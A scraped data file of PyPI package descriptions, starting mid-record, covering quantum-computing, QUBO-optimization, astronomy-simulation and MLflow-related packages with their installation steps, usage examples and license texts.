optimized parameters from previous layers is also available.Error metricsTo benchmark the optimization we can use some common metrics, like the $L^1$ norm, $L^2$ norm, $L^\\infty$ norm or infidelity $1-F$, to compare the function encoded in the circuit with the desired function. 
Following our example,fnis agaussian:l1_list,l2_list,inf_list,infidelity_list=metric_results(params_list,circuit,fn=gaussian,fn_kwargs={'mean':0.0,'std':0.5,'coef':1})Wrapping upTest the library yourself!importnumpyasnpfromqubit_approximant.benchmarking.functionsimportgaussianfromqubit_approximant.coreimportCircuitRxRyRz,Cost,BlackBoxOptimizer,LayerwiseOptimizerfromqubit_approximant.benchmarkingimportmetric_resultsx=np.linspace(-2.5,2.5,1000)fn_kwargs={'mean':0.0,'std':0.5,'coef':1}fn=gaussian(x,**fn_kwargs)circuit=CircuitRxRyRz(x,encoding='prob')cost=Cost(fn,circuit,metric='mse')optimizer=BlackBoxOptimizer(method=\"L-BFGS-B\")min_layer=3init_params=np.random.default_rng().standard_normal(4*min_layer)layerwise_opt=LayerwiseOptimizer(optimizer,min_layer=min_layer,max_layer=7,new_layer_coef=0.3,new_layer_position='random')params_list=layerwise_opt(cost,cost.grad,init_params)l1_list,l2_list,inf_list,infidelity_list=metric_results(fn=gaussian,fn_kwargs={'mean':0.0,'std':0.5,'coef':1},circuit=circuit,params_list=params_list)Bonus: benchmarking multiple initial parametersThe initial paramenters for the optimizer are generated at random with aseedof our choice. We can benchmark the optimizer against multiple seeds (since it is a time consuming task it is parallelized usingmpi).benchmark_seeds(num_seeds=4,fn=gaussian,fn_kwargs=fn_kwargs,circuit=circuit,cost=cost,optimizer=multilayer_opt,filename=\"results\",)ReferencesThis library is based on Adrian P\u00e9rez Salinas articleData re-uploading for a universal quantum classifier.ContributingPull requests are welcome. For major changes, please open an issue first\nto discuss what you would like to change.Please make sure to update tests as appropriate.LicenseThis software is under theGNU General Public License v3.0."} +{"package": "qubitcoin", "pacakge-description": "An ECDSA and XMSS interchangeable, decentralized P2P, mining-resistant, fully anonymized, self-regulating and backward stochastic python implementation of the bitcoin protocol"} +{"package": "qubitcoind", "pacakge-description": "An ECDSA and XMSS interchangeable, decentralized P2P, mining-resistant, fully anonymized, self-regulating and backward stochastic python implementation of the bitcoin protocol"} +{"package": "qubiter", "pacakge-description": "Qubiter at GitHubTutorialThe following Jupyter notebook is a\ngood introduction to Qubiter's basic features. Other notebooks\nin Qubiter's jupyter notebook folder\ndiscuss more advanced features:https://github.com/artiste-qb-net/qubiter/blob/master/qubiter/jupyter_notebooks/Say_Hello_World_With_Qubiter.ipynbInstallationThe simplest thing that avoids\nmany of the installation hassles is to get an account\non our Amazon cloud servicewww.bayesforge.com. It's free for one year.\nBayesforge already has\nall of Python and Qubiter installed (although you may need to\nupdate Qubiter using Git).\nBayesforge is also available on the Tencent cloud.Of course, you can also clone the latest version or update\nan older version of Qubiter on your computer\nfrom this repo by using Git commands.Alternatively, you can install an older but more stable version\nof Qubiter from the Python package\nmanagerpipusing:pip install qubiter --userIf you are using a Jupyter notebook, use:!pip install qubiter --userand restart the kernel.What is Qubiter?The Qubiter project aims to provide eventually a full suite of tools, written mostly in Python, for designing and simulating quantum circuits on classical computers. 
(So it will address only the needs of gate-model, not annealer, quantum computer engineers.) We or others could start a similar project for annealers. An earlier C++ computer program also called Qubiter (see http://www.ar-tiste.com/qubiter.html), written by Robert R. Tucci, did only quantum compiling. This newer project includes a quantum CSD compiler similar to the earlier Qubiter, based on the (Cosine-Sine) CS Decomposition of Linear Algebra, but written in Python. But this new project also includes much more than that. We've included classes for reading and writing quantum circuit files, for expanding circuits with gates that have multiple controls into circuits with only CNOTs and single-qubit rotation gates, and for embedding a circuit inside a larger one. And, last but not least, we've included a simulator. The simulator hasn't been benchmarked but should be pretty fast, because it relies on Numpy, which is a Python wrapper for C code. Besides being amply documented with docstrings, each class has a main method at the end giving examples of its usage (and testing it). Plus we've included a large and ever increasing collection of Jupyter notebooks that teach some physics and how to use Qubiter at the same time. The quantum circuits are saved as text files, which allows easy exchange between QC engineers. The quantum circuits are drawn in ASCII (not in postscript or in a proprietary format). We hope we can convince you that ASCII drawings of quantum circuits are surprisingly clear, expressive, and convenient, really all you need; plus, unlike other formats, they are super easy to edit. Using other formats might require you to master difficult subjects like postscript in order to write/edit circuit files. This is totally unnecessary! Quantum Fog at GitHub (see https://github.com/artiste-qb-net/quantum-fog) is a twin project started by the same people. We hope that eventually Quantum Fog will call Qubiter to perform some tasks, like quantum compiling and simulating. All of Qubiter at GitHub except for the contents of the quantum_CSD_compiler folder is licensed under the BSD license (3-clause version) with an added clause at the end, taken almost verbatim from the Apache 2.0 license, granting additional patent rights. See LICENSE.md. The contents of Qubiter's quantum_CSD_compiler folder are licensed under the GPLv2 (Linux) license. Contributors (Alphabetical Order): Dekant, Henning; Tregillus, Henry; Tucci, Robert; Yin, Tao"} +{"package": "qubit-hash", "pacakge-description": "No description available on PyPI."} +{"package": "qubit-hashs", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qubitmapping", "pacakge-description": "No description available on PyPI."} +{"package": "qubit-opencensus", "pacakge-description": "OpenCensus Utils - A collection of tools for use with OpenCensus Python. A collection of utilities for https://github.com/census-instrumentation. Python: trace, propagator, jaeger, asyncio_context, tracers, asyncio_context_tracer, ext, sanic, aiohttp, aioredis. Installation & basic usage: For Python, install the qubit-opencensus package using pip or pipenv:\npip install qubit-opencensus"} +{"package": "qubits", "pacakge-description": "Abstract: QUBITS is a python package and command-line tool used to simulate\nvarious flavours of astronomical transient surveys. 
The simulations are\ndesigned to be easy to use and tailor without having to hack any code,\nand many of the simulation parameters can be found in one settings file.Although recoded from scratch, thesecond chapter of my\nthesisdescribes most of the\ndetails used to build these transient survey simulations.Installation and Setting Up Your EnvironmentQUBITS relies heavily on`pysynphot`__\nwhich no longer supports a PyPI distribution. Therefore the easiest way\nto get QUBITS running is to installAnacondaand then use\ntheSTScI\u2019s AstroConda channel to install their Standard Software\nStack(which includes pysynphot). Once this stack is installed,\ncreate/activate a conda environment that includes the stack and run:pip install qubitsThis should install the QUBITS code and all of its dependencies. If this\ndoesn\u2019t work, or you want to tinker with the code by installing QUBITS\nas a development package, then clone the project using this command:git clone git@github.com:thespacedoctor/qubits.git and thencd and:python setup.py installorpython setup.py developPYSYN_CDBSThe STScI Calibration Reference Data SystemNote that the data files required bypysynphot, and hence QUBITS,\nare distributed separately bySTScI Calibration Reference Data\nSystem.\nBefore starting you will need to download of the calibration data from\nthe FTP area linked from theSTScI\nwebpage,\nunpack them somewhere appropriate and organise them into a single nested\nfolder structure like so:PYSYN_CDBSFinally, you need to make sure thePYSYN_CDBSenvironment variable\nis set sopysynphotknows where these data live. Add the following to\nyour.bashrcfile and don\u2019t forget to open a new terminal window\nbefore you begin to use QUBITS:bash exportPYSYN_CDBS=/path/to/cdbs/I haven\u2019t tested this on many other machines so let me know what goes\nwrong with the installation!UsageUsage:\n qubits init \n qubits run -s -o -d \n\n COMMANDS\n --------\n init setup a qubits settings file and a test spectral database\n\n ARGUMENTS\n ---------\n pathToSettingsFile path to the yaml settings file\n pathToWorkspace path to a directory within which to setup an example qubit workspace\n\n FLAGS\n -----\n -h, --help show this help message\n -s, --settings provide a path to the settings file\n -d, --database provide the path to the root directory containing your nested-folders and files spectral database\n -o, --output provide a path to an output directory for the results of the simulations*Quick StartIf you\u2019re using QUBITS for the first time, or have not used it in a\nwhile, the best way to start is to use thequbits initcommand to\ngenerate a template workspace for yourself. Running the command:bash qubits init ~/Desktop/qubits_workspacecreates a template workspace on your desktop with:a template spectral databasequbits_spectral_database,a default qubits settings filequbits_settings.yaml,an empty output directoryqubits_outputqubits template workspaceOnce you familiarise yourself with running QUBITS you can move this\nworkspace elsewhere and tailor the spectral database and settings file\nto your needs.Building a Spectral DatabaseWithin the folder you choose to place your spectral database, create\nappropriately named folders for each of the specific transient objects\nyou would like to include in the simulations. Note these are the names\nto be included in the settings file (see below) and that will appear in\nresults files, plots and logs. 
Your database might look like this:qubits_spectral_database/\n SNIa/\n t-021.00.spec\n t-012.00.spec\n t+003.00.spec\n t+015.00.spec\n t+024.00.spec\n t+068.00.spec\n t+098.00.spec\n t+134.00.spec\n SNIIp/\n ...\n SLSN/\n ...Name your spectral files with times relative to some epoch within the\ntransient\u2019s evolution (e.g. peak magnitude or explosion date). QUBITS\nwill determine the time of peak magnitude when generating the\nlightcurves from the spectra and recalibrate the time scale relative to\nthis point. The files should contain two space separated columns\ncontaining wavelength (\u00c5) and flux (ergs/s/cm^2/\u00c5). Have a look in the\ntemplate database supplied by thequbits initcommand.Settings FileA template simulation settings file is provided by thequbits initcommand and should look something like this:version: 1\n\n##### PROGRAM EXECUTION SETTINGS #####\nProgram Settings:\n # STAGE 1 - LIGHTCURVES\n Extract Lightcurves from Spectra: True\n # STAGE 2 - KCORRECTION DATABASE\n Generate KCorrection Database: True\n Generate KCorrection Plots: True # ONLY SET TO TRUE IF ONLY A FEW KCORRECTIONS ARE TO BE CALCULATED\n # STAGE 3 - RUNNING SIMULATION\n Run the Simulation: True\n Plot Simulation Helper Plots: True # ONLY PLOT IF DEBUGGING\n # STAGE 4 - COMPILING RESULTS\n Compile and Plot Results: True\n Simulation Results File Used for Plots: simulation_results_20130919t131758.yaml\n\n###### SIMULATED SURVEY CONSTRAINTS ######\nExtra Survey Constraints:\n Faint-Limit of Peak Magnitude: 21.50 # The lower-limit of the apparent peak magnitude so that the transient can be distinguished from other flavours of transients. Set this to 99.9 for this setting to be disregarded.\n Observable for at least ? number of days: 100 #\u00a0Set this to 1 for this setting to be distregarded\nLower Redshift Limit: 0.00 ## Usually set to 0.0\nUpper Redshift Limit: 1.0\nRedshift Resolution: 0.05 ## Higher resolution (lower number) means the simulations are more accuate but the code shall take long to run, especially for the k-correction database generation.\nSky Area of the Survey (square degrees): 70\nLimiting Magnitudes:\n g : 23.3\n r : 23.3\n i : 23.3\n z : 21.7\nSurvey Cadence:\n # YEAR MINUS FRACTION LOST DUE TO OBJECTS BEING LOCATED BEHIND THE SUN\n Observable Fraction of Year: 0.5\n Fraction of Year Lost to Weather etc: 0.4\n Filters:\n - band: g\n day of year of first scheduled observation: 1\n repeat every ? days: 3\n Fraction of Lunar Month Lost to Moon: 0.27\n - band: r\n day of year of first scheduled observation: 1\n repeat every ? days: 3\n Fraction of Lunar Month Lost to Moon: 0.27\n - band: i\n day of year of first scheduled observation: 2\n repeat every ? days: 3\n Fraction of Lunar Month Lost to Moon: 0.27\n - band: z\n day of year of first scheduled observation: 3\n repeat every ? days: 3\n Fraction of Lunar Month Lost to Moon: 0.27\n\n###### K-CORRECTION GENERATION ######\nRest Frame Filter for K-corrections: g # This is the filter that the k-corrections are anchored to. 
The simulations will convert from this observed band magnitude to the rest frame magnitudes to calculate the k-correction.\nK-correction temporal resolution (days): 1.0 # Only increase the resolution here if you have many spectra in your database and k-corrections are taking too long to generate.\nOrder of polynomial used to fits k-corrections: 18 # Check the k-correction polynomial plots and tweak this value as needed.\nMinimum number of datapoints used to generate k-correction curve: 3 # If the are not enough spectra or too many spectra have been redshifted out of the range of the observed frame band-pass, then there are few points to generate a polynomial k-correction lightcurve. 3 is probably the barely-passable minimum.\n\n###### SIMULATED UNIVERSE CONSTRAINTS ######\nCCSN Progenitor Population Fraction of IMF: 0.007\nTransient to CCSN Ratio: 10e-5\nSimulation Sample: 50 # Number of transients to include in simulations. More = more accurate but sims take longer to run. 100 good for testing & 10,000 good for science.\nExtinctions:\n constant or random: constant # Parameter not yet implemented - leave as `constant`\n constant E(b-v): 0.023 # 0.023 is the mean for the PS1-MD fields\n host: # Parameter not yet implemented\n galactic: # Parameter not yet implemented\nRelative Rate Set to Use: SLSNe\nRelative SN Rates:\n SLSNe:\n SN2007bi: 0.5 # make sure transient names correspond to folder names containing thier spectral data-sets\n SLSN: 0.5\nSN Absolute Peak-Magnitude Distributions:\n magnitude:\n SN2007bi: -17.08\n SLSN: -20.21\n sigma:\n SN2007bi: 0.001\n SLSN: 0.001\n\n###### LIGHTCURVE GENERATION & CONSTRAINTS\nLightcurves:\n SN2007bi:\n End of lightcurve relative to peak: 300 # Constrain the end of the lightcurve so polynomial fits don't go awal\n SLSN:\n End of lightcurve relative to peak: 220\nOrder of polynomial used to fits lightcurves: 6 # Check the extracted lightcurve plots and tweak this value as needed.\n# Often it is useful to set a an explosion day (relative to the timescale used in naming the files in the spectral database).\n# This helps constrain the polynomials of the light- and K-correction- curves generated in the simulations.\n# SET TO `None` TO DISREGARD THIS SETTING\nExplosion Days:\n SLSN: -70\n SN2007bi: -70\n# You can also extend the tail of the lightcurve to better constrain the polynomial. Set to `True` or `False`\nExtend lightcurve tail?:\n SLSN: True\n SN2007bi: True\n\n###### LOGGING\nLevel of logging required: WARNING # DEBUG, INFO, WARNING, ERROR or CRITICALThe QUBITS Simulation StagesThe four stages of the simulation are:Extracting the Lightcurves from SpectraGenerating a K-Correction DatabaseRunning the Simulation, andCompiling and Plotting ResultsAt the top of this settings file you turn the various stages of the\nsimulation build on and off:Program Settings:\n # STAGE 1 - LIGHTCURVES\n Extract Lightcurves from Spectra: True\n # STAGE 2 - KCORRECTION DATABASE\n Generate KCorrection Database: True\n Generate KCorrection Plots: True # ONLY SET TO TRUE IF ONLY A FEW KCORRECTIONS ARE TO BE CALCULATED\n # STAGE 3 - RUNNING SIMULATION\n Run the Simulation: True\n Plot Simulation Helper Plots: True # ONLY PLOT IF DEBUGGING\n # STAGE 4 - COMPILING RESULTS\n Compile and Plot Results: True\n Simulation Results File Used for Plots: simulation_results_20130919t131758.yamlWhen you first use the simulations it\u2019s best to set all stages of the\nsimulation toFalse, then incrementally run the code through each\nstage. 
You will always run the code with thequbits runcommand with\nthe following syntax:bash qubits run-s-o-dSo to run QUBITS with our template workspace we setup in the quick start\nworkspace above, we run:bash qubits run-s~/Desktop/qubits_workspace/qubits_settings.yaml-o~/Desktop/qubits_workspace/qubits_output-d~/Desktop/qubits_workspace/qubits_spectral_databaseBelow you will find details of each build stage of the simulation - read\nthe settings file comments to determine which settings you need to\ntailor for the simulation you are trying to run.1. Extracting the Lightcurves from SpectraThis stage generates thez=0lightcurves. Lightcurve plots are\ncreated in theplotsfolder in the output directory. Please note\nQUBITS\u2019 ability to generate decent lightcurves relies heavily on the\nquality of your spectral database; it needs good wavelength coverage to\nbe able to synthesize the photometry and good temporal coverage to build\nan entire lightcurve. The extracted lightcurves are stored as python\nobjects in the a file\ncalledtransient_light_curves.yamlin.Once you\u2019ve generated the lightcurves, have a look at the lightcurve\nplots (some may be blank if temporal/wavelength coverage was deemed too\npoor to create a lightcurve for the given band-pass atz=0). You may\nwant to tweak some lightcurve parameters in the settings file and\nrebuild the lightcurve plots. Once you\u2019re happy move onto the next\nstage.example lightcurveCurrent filters are the PS1g,r,i,zfilters.Notepysynphotcan be very chatty and prints log messages straight to\nstdout which can\u2019t be turned off easily. Don\u2019t worry if you see\nsomething like this:\u2026 does not have a defined binset in the wavecat table. The waveset\nof the spectrum will be used instead.2. Generate K-Correction DatabaseThe code will use the spectra to generate a database of K-corrections\nwith the given settings. They will be created in thek_correctionsdirectory of your output folder. For each redshift and k-correction\nfilter-set, a dataset is generated which is used to create a polynomial\nforrest frame epochvskcorrection. Note the k-corrections also act\nas colour-transformations between filters at low-redshift.By settingGenerateK-CorrectionPlotstoTruea plot for each\nK-correction dataset will be generated. Set this to true if only a few\nk-corrections are to be calculated, i.e. when you are testing/debugging\nthe simulation - otherwise the k-correction generation will take\nforever!example k-correction polynomial3. Run the SimulationHere the simulation is run using the settings found in the settings file\n(cadence of observation, limiting-magnitudes, survey volume, loss due to\nweather etc). This stage is a two part process:Simulating the Universe- placing SNe throughout the volume\nrequested at random redshifts, with the relative-rate supplied and\nwith the peak magnitude distributions given.Simulating the Survey- simulates the survey with the setup\nsupplied in the settings files with cadence of observation,\nlimiting-magnitudes, survey volume, loss due to weather etc.The results of the simulation are place in a (large) date-time stamped\nyaml file in the output folder named something similar tosimulation_results_20130425t053500.yaml. The date-time appended to\nthe filename will be the time the simulation was run so you can run many\nsimulations without worrying about overwriting previous outputs. 
The\nsettings used to run the simulation are also recorded in this file.ThePlot Simulation Helper Plotssetting should only be set toTrueif you are trying to debug the code and work out how the input\ndata is being manipulated to create the simulations.4. Compile and Plot ResultsUse theSimulation Results File Used for Plotssetting to set the\nsimulation results file used to generate the result plots and log:Simulation Results File Used for Plots: simulation_results_20130425t053500.yamlThis compiles the results into a markdown file (plain text with minimal\nmarkup) and a styled HTML file into the/resultsfolder with names similar to:simulation_result_log_20130426t110856.md\nsimulation_result_log_20130426t110856.htmlHere is an example of the output log file:example results fileWARNINGSQUBITS can return many warnings, usually related the limitations of your\nspectral databases. Here are some:\u2018does not have a defined binset in the wavecat table. The waveset\nof the spectrum will be used instead.\u2019: This is a pysynphot message\nand not a QUBITS log. Don\u2019t worry.\u2018 failed with this error: Spectrum and bandpass are disjoint\u2019:\nThis generally means the spectrum quoted doesn\u2019t cover the wavelength\nrange of the band-pass and therefore a magnitude can\u2019t be\nsynthesised.\u2018Spectrum and bandpass do not fully overlap. You may use\nforce=[extrap|taper] to force this Observation anyway.\u2019: As above\nbut the spectral wavelength range does partially cover the band-pass\u2018could not find the magnitude from spectrum /***/t+601.00.spec\nusing the filter sdss,g - failed with this error: Integrated flux is\n<= 0\u2019: This generally means the spectrum quoted doesn\u2019t entirely\ncover the wavelength range of the band-pass and therefore a magnitude\ncan\u2019t be synthesised.\u2018the k-correction file z0pt30.yaml contains less than 3 datapoints\nto convert from g restframe to z observed frame for the SNOne model -\npolynomial shall not be generated\u2019: The was not enough\ntemporal/wavelength coverage to generate k-corrections for the quoted\nrest/observed frame filter-set at this redshiftIssuesPlease report any issueshere.Pull requestsare\nwelcomed!LicenseCopyright (c) 2016 David YoungPermission is hereby granted, free of charge, to any person obtaining a\ncopy of this software and associated documentation files (the\n\u201cSoftware\u201d), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish,\ndistribute, sublicense, and/or sell copies of the Software, and to\npermit persons to whom the Software is furnished to do so, subject to\nthe following conditions:The above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.THE SOFTWARE IS PROVIDED \u201cAS IS\u201d, WITHOUT WARRANTY OF ANY KIND, EXPRESS\nOR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE."} +{"package": "qubit-simulator", "pacakge-description": "Qubit SimulatorQubit Simulator is a simple and lightweight library that provides a quantum simulator for simulating qubits and quantum gates. 
It supports basic quantum operations and gates such as Hadamard, \u03c0/8, Controlled-Not, and generic unitary transformations.InstallationInstall Qubit Simulator via pip:pipinstallqubit-simulatorUsageInitializing the SimulatorCreate a simulator with a specified number of qubits:fromqubit_simulatorimportQubitSimulatorsimulator=QubitSimulator(3)Applying GatesApply various quantum gates to the qubits:simulator.h(0)# Hadamard gatesimulator.t(1)# \u03c0/8 gatesimulator.cx(0,2)# Controlled-Not gateCustom GatesDefine and apply custom gates using angles:simulator.u(2,0.3,0.4,0.5)# Generic gateMeasurementsMeasure the state of the qubits:print(simulator.run(shots=100)){'000': 46, '001': 4, '100': 4, '101': 46}Circuit RepresentationGet a string representation of the circuit:print(simulator)-----------------------------------\n| H | | @ | |\n| | T | | |\n| | | X | U(0.30, 0.40, 0.50) |\n-----------------------------------Wavefunction PlotShow the amplitude and phase of all quantum states:simulator.plot_wavefunction()TestingTests are included in the package to verify its functionality and provide more advanced examples:python3-mpytesttests/LicenseThis project is licensed under the MIT License."} +{"package": "qublets", "pacakge-description": "QubletsQublets is an approachable Quantum Computing Library written in Python using Intel'sintel-qsQuantum Computing Simulator. The goal of the library is to make introductory quantum computing approachable at the undergraduate (or lower) level.SetupIf you are on Unix, the easiest way to start using qublets is by installing the pre-compiledpip module:pipinstallqubletsIf you don't havepipinstalled, it takes 30 seconds and it will make your life managing Python deps much easier:cd~\ncurlhttps://bootstrap.pypa.io/get-pip.py>get-pip.py\npython3get-pip.pyIf you arenoton Unix or don't want to install pip, you can alwaysbuild from sourceGetting StartedQublets makes it easy to run simple quantum examples. Consider the classic \"Superposition qubit\" case:fromqubletsimportQUIntresult=QUInt.zeros(1).hadamard().measure()print(result)As you can see, Qublets aims to be as readable as possible (although you can customize quite a bit later). Running the code above will yield a150% of the cases and a0the rest. That's it. You may also notice (most) Qublets operators are chainable and will return the object they operated on - this makes building circuits a breeze.If you're familiar with quantum state names, you can make the above example even shorter by using a|+\u3009state:fromqubletsimportQUIntresult=QUInt.pluses(1).measure()print(result)You may have noticed Qublets supports integers natively - in fact, it supports both unsigned and signed integers of any given size (that your computer can work with without combusting in flames). The example above easily generalizes to a 4-bit QInt:fromqubletsimportQIntresult=QInt.pluses(4).measure()print(result)Now, you'd instead get a (mostly) uniformly random number between-8and7.It wouldn't really be a quantum computing library if we didn't entangle some bits so let's do that quickly:fromqubletsimportQUIntq1=QUInt.zeros(2)q1[0].hadamard()q1[1].c_negate(on=q1[0])print(q1.measure())# Or, just like before, we can use a shortcutprint(QUInt.fully_entangled(2).measure())If you're familiar with quantum computing's ABCs, you'd likely be happy to see only0and3as the possible values of the measurements. 
That's because the classic had/cnot combo will give us a perfect |Φ+⟩ state (a bell pair) to work with. fully_entangled, on the other hand, will always entangle all the bits in a QInt using a chain of cnots - which would be equivalent for only 2 bits. Qublets also supports cross-q(u)int operations, built-in primitives, batch runs for your circuits, extracting probability amplitudes and more - you can find some inspirational samples in docs/examples/"} +{"package": "qubo", "pacakge-description": "QUBO: A Quadratic Unconstrained Binary Optimization (QUBO) problem is an NP-hard problem which aims at minimizing\n$$x^T Q x = \sum_{i \leq j} Q_{ij}x_{i}x_{j}$$\nwhere $Q$ is an upper triangular matrix and $x_1$, ..., $x_N$ are binary variables. A wide range of optimization problems can be formulated as QUBO models."} +{"package": "qubogen", "pacakge-description": "QUBOgen: QUBO matrix generator on major combinatorial optimization problems, written in Python. Installation:\n$ git clone https://github.com/tamuhey/qubogen\n$ cd qubogen\n$ pip install -e .\nUsage: See Number Partitioning example in Jupyter Notebook. Refs: A Tutorial on Formulating and Using QUBO Models. MIT License. Copyright (c) 2019 tamuhey. Permission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software. THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "qubole-ml", "pacakge-description": "MLflow is a platform to streamline machine learning development, including tracking experiments, packaging code\ninto reproducible runs, and sharing and deploying models. MLflow offers a set of lightweight APIs that can be\nused with any existing machine learning application or library (TensorFlow, PyTorch, XGBoost, etc), wherever you\ncurrently run ML code (e.g. in notebooks, standalone applications or the cloud). 
MLflow\u2019s current components are:MLflow Tracking: An API to log parameters, code, and\nresults in machine learning experiments and compare them using an interactive UI.MLflow Projects: A code packaging format for reproducible\nruns using Conda and Docker, so you can share your ML code with others.MLflow Models: A model packaging format and tools that let\nyou easily deploy the same model (from any ML library) to batch and real-time scoring on platforms such as\nDocker, Apache Spark, Azure ML and AWS SageMaker.MLflow Model Registry: A centralized model store, set of APIs, and UI, to collaboratively manage the full lifecycle of MLflow Models.InstallingInstall MLflow from PyPI viapip install mlflowMLflow requirescondato be on thePATHfor the projects feature.Nightly snapshots of MLflow master are also availablehere.DocumentationOfficial documentation for MLflow can be found athttps://mlflow.org/docs/latest/index.html.CommunityFor help or questions about MLflow usage (e.g. \u201chow do I do X?\u201d) see thedocsorStack Overflow.To report a bug, file a documentation issue, or submit a feature request, please open a GitHub issue.For release announcements and other discussions, please subscribe to our mailing list (mlflow-users@googlegroups.com)\nor join us onSlack.Running a Sample App With the Tracking APIThe programs inexamplesuse the MLflow Tracking API. For instance, run:python examples/quickstart/mlflow_tracking.pyThis program will useMLflow Tracking API,\nwhich logs tracking data in./mlruns. This can then be viewed with the Tracking UI.Launching the Tracking UIThe MLflow Tracking UI will show runs logged in./mlrunsathttp://localhost:5000.\nStart it with:mlflow uiNote:Runningmlflow uifrom within a clone of MLflow is not recommended - doing so will\nrun the dev UI from source. We recommend running the UI from a different working directory,\nspecifying a backend store via the--backend-store-urioption. Alternatively, see\ninstructions for running the dev UI in thecontributor guide.Running a Project from a URIThemlflow runcommand lets you run a project packaged with a MLproject file from a local path\nor a Git URI:mlflow run examples/sklearn_elasticnet_wine -P alpha=0.4\n\nmlflow run https://github.com/mlflow/mlflow-example.git -P alpha=0.4Seeexamples/sklearn_elasticnet_winefor a sample project with an MLproject file.Saving and Serving ModelsTo illustrate managing models, themlflow.sklearnpackage can log scikit-learn models as\nMLflow artifacts and then load them again for serving. There is an example training application inexamples/sklearn_logistic_regression/train.pythat you can run as follows:$ python examples/sklearn_logistic_regression/train.py\nScore: 0.666\nModel saved in run \n\n$ mlflow models serve --model-uri runs://model\n\n$ curl -d '{\"columns\":[0],\"index\":[0,1],\"data\":[[1],[-1]]}' -H 'Content-Type: application/json' localhost:5000/invocationsContributingWe happily welcome contributions to MLflow. Please see ourcontribution guidefor details."} +{"package": "qubolepystream", "pacakge-description": "PyQuboleA watered down version of Qubole's Python connector providing a much simpler API to interact with for running streaming queries or submitting a job and rerieving its output at a later time (sync or async). Allowing for easy use in notebooks or integration in projects without much overhead. 
Based on Qubole QDS-SDK-Pyhttps://github.com/qubole/qds-sdk-pyInstalltionFrom PyPIThe library is available onPyPI - PyQubole.$ pip install qubolepystreamFrom Source\u2022Get source code: SSHgit@github.com:achilleasatha/PyQubole.gitor HTTPShttps://github.com/achilleasatha/PyQubole.git\u2022Install by runningpython setup.py installAPIYou can find an example application inexample/main.pyincluding a Spark command exampleexample/spark_example.py.More info on running Spark commands:Qubole docs - Submit a Spark commandAn example application needs to do:Import the libfrom qubolepystream.connector import QuboleConnectorSet the api_token and instantiate the connectioncon = QuboleConnector(api_token='api_token')Use the query data method to run a job, specifying the input query, engine and cluster (or just job_id):data = con.query_data(sql_query=query, job_id=None, engine='Hive', cluster='Hive_cluster_name', verbose=False)Note:a) Query can be passed as a raw stringquery = r\"\"\"select * from table\"\"\"or from a file:query = open('query.sql').read()b) Ifjob_id = Nonethe query will be executed on the engine specified ('Hive', 'Presto' or 'Spark'')c) Ifjob_id = '123456'then the results of the job will be retrieved (if job status is done)d) You can use the optional methodverbose = True / Falseto get streaming logs output or only status updates"} +{"package": "qubole-tco", "pacakge-description": "No description available on PyPI."} +{"package": "qubolite", "pacakge-description": "quboliteA light-weight toolbox for working with QUBO instances in NumPy.Installationpip install quboliteThis package was created using Python 3.10, but runs with Python >= 3.8.Optional DependenciesIf you're planning to use the roof dual function as lower bound you will need to install optional\ndependencies. The igraph based roof dual lower bound function can be used by callingqubolite.bounds.lb_roof_dual(). It requires that theigraphlibrary is\ninstalled. This can be done withpip install igraphor by installing qubolite withpip install qubolite[roof_dual].Using the functionqubolite.ordering_distance()requires the Kendall-\u03c4 measure from thescipylibrary which can be installed bypip install scipyor by installing\nqubolite withpip install qubolite[kendall_tau].For exemplary QUBO embeddings (e.g. clustering or subset sum), thescikit-learnlibrary is required. 
It can be installed by either usingpip install scikit-learnor installing qubolite withpip install qubolite[embeddings].If you would like to install all optional dependencies you can usepip install qubolite[all]for\nachieving this.Usage ExamplesBy design,quboliteis a shallow wrapper aroundnumpyarrays, which represent QUBO parameters.\nThe core class isqubo, which receives anumpy.ndarrayof size(n, n).\nAlternatively, a random instance can be created usingqubo.random().>>> import numpy as np\n>>> from qubolite import qubo\n>>> arr = np.triu(np.random.random((8, 8)))\n>>> Q = qubo(arr)\n>>> Q2 = qubo.random(12, distr='uniform')By default,qubo()takes an upper triangle matrix.\nA non-triangular matrix is converted to an upper triangle matrix by adding the lower to the upper triangle.To get the QUBO function value, instances can be called directly with a bit vector.\nThe bit vector must be anumpy.ndarrayof size(n,)or(m, n).>>> x = np.random.random(8) < 0.5\n>>> Q(x)\n7.488225478498116\n>>> xs = np.random.random((5,8)) < 0.5\n>>> Q(xs)\narray([5.81642745, 4.41380893, 11.3391062, 4.34253921, 6.07799747])SolvingThe submodulesolvingcontains several methods to obtain the minimizing bit vector or energy value of a given QUBO instance, both exact and approximative.>>> from qubolite.solving import brute_force\n>>> x_min, value = brute_force(Q, return_value=True)\n>>> x_min\narray([1., 1., 1., 0., 1., 0., 0., 0.])\n>>> value\n-3.394893116198653The methodbrute_forceis implemented efficiently in C and parallelized with OpenMP.\nStill, for instances with more than 30 variables take a long time to solve this way.DocumentationThe complete API documentation can be foundhere.Version Log0.2Added problem embeddings (binary clustering, subset sum 